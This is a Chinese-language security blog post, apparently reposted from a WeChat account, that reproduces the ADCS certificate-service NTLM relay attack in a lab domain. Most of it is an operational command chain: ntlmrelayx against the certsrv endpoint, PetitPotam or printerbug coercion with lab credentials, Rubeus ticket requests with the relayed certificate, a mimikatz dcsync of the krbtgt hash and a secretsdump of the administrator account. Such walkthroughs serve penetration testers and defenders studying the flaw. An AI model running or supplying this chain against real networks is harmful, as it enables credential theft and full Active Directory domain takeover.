ADCS证书服务攻击

admin 2021年12月17日10:38:42评论289 views字数 1298阅读4分19秒阅读模式
ADCS证书服务攻击
ADCS证书服务攻击

前言:关于NTLM Relay:你所不知道的NTLM Relay


    由于ADCS的http证书接口没有启用NTLM中继保护,因此其易受NTLM Relay攻击。而且Authorization HTTP 标头明确只允许通过 NTLM 身份验证,因此Kerberos协议无法使用。因此,攻击者可以利用NTLM Relay攻击ADCS证书服务。

关于搭建ADCS证书服务:配置启用基于SSL的LDAP(LDAPS)


ADCS证书服务攻击

http://10.211.55.4/certsrv/certfnsh.asp


ADCS证书服务攻击


01
漏洞复现


定位证书服务器机器


ADCS证书服务攻击

certutil -config - -ping


ADCS证书服务攻击


ntlmrelayx监听,这里需要新的impacket:https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack

ADCS证书服务攻击

python3 ntlmrelayx.py -t http://10.211.55.4/certsrv/certfnsh.asp -smb2support --adcs --template 'domain controller'


ADCS证书服务攻击


使用脚本触发辅助域控回连我们的攻击机器,这里可以使用最新的Petitpotam.py,也可以使用printerbug.py 。详情:利用PetitPotam进行NTLM Relay攻击


ADCS证书服务攻击

python3 Petitpotam.py -d xie.com -u hack -p P@ss1234 10.211.55.2 10.211.55.5


#或者使用printerbug.py也可以触发

python3 printerbug.py xie/[email protected] 10.211.55.2


ADCS证书服务攻击



ADCS证书服务攻击


获取到base64编码的证书数据,会打印出很多个base64编码的证书,我们随便选择一个即可。


ADCS证书服务攻击


然后使用Rubeus导入证书数据


ADCS证书服务攻击

Rubeus.exe asktgt /user:AD02$ /certificate:打印出来的base64的证书数据 /ptt


ADCS证书服务攻击


ADCS证书服务攻击


然后使用mimikatz即可导出域内任意用户哈希


ADCS证书服务攻击

mimikatz.exe

#查看kerberos票据

kerberos::list

#导出krbtgt用户的hash

lsadump::dcsync /user:krbtgt /csv


ADCS证书服务攻击


或者可以手动导入证书


ADCS证书服务攻击

kerberos::ptt ticket.kirbi


ADCS证书服务攻击


也可以使用kekeo将.kirbi后缀的证书转换为 .ccache后缀的证书,然后使用impacket工具进行利用。


ADCS证书服务攻击

misc::convert ccache ticket.kirbi


ADCS证书服务攻击


ADCS证书服务攻击

export [email protected][email protected]

proxychains4 -q python3 secretsdump.py -k -no-pass AD01.xie.com -just-dc-user administrator


ADCS证书服务攻击


ADCS证书服务攻击
END

如果想跟我一起讨论,那快加入我的知识星球吧!https://t.zsxq.com/7MnIAM7


ADCS证书服务攻击


本文始发于微信公众号(谢公子学安全):ADCS证书服务攻击

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月17日10:38:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ADCS证书服务攻击http://cn-sec.com/archives/482041.html

发表评论

匿名网友 填写信息